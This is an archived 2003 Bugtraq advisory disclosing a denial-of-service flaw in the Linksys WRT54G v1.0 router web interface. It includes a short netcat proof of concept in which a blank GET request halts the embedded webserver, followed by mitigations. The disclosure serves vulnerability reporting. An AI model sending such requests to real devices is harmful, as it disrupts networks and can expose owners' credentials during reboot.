Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Bugtraq: Linksys WRT54G Denial of Service Vulnerability

Linksys WRT54G Denial of Service Vulnerability

From: <test_at_techcentric.net>
Date: 3 Dec 2003 22:35:26 -0000
('binary' encoding is not supported, stored as-is) Linksys WRT54G Denial of Service Vulnerability



System(s)
===========

Tested on Linksys WRT54G v1.0 (firmware v 1.42.3)


Detail(s)
===========

Sending a blank GET request to the router on port 80 (or 8080) halts the embedded webserver. This may allow an attacker to force the owner to reboot the router, allowing them to gain sensitive information during router authentication.

Exploitation
============

user_at_test:~$ nc 10.0.0.1 80
GET
user_at_test:~$ nc 10.0.0.1 80
(UNKNOWN) [10.0.0.1] 80 (http) : Connection refused
user_at_test:~$

Solution(s)
============

- Https service should continue running for remote access.
- Scan for sniffers that might be on the network before rebooting and performing any authentication.
- Wait for a vendor patch :)

Status
============

Vendor contacted on 12/03/03.


!HAPPY HOLIDAYS!
carbon_at_techcentric.net - 12/02/03
Received on Dec 03 2003
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos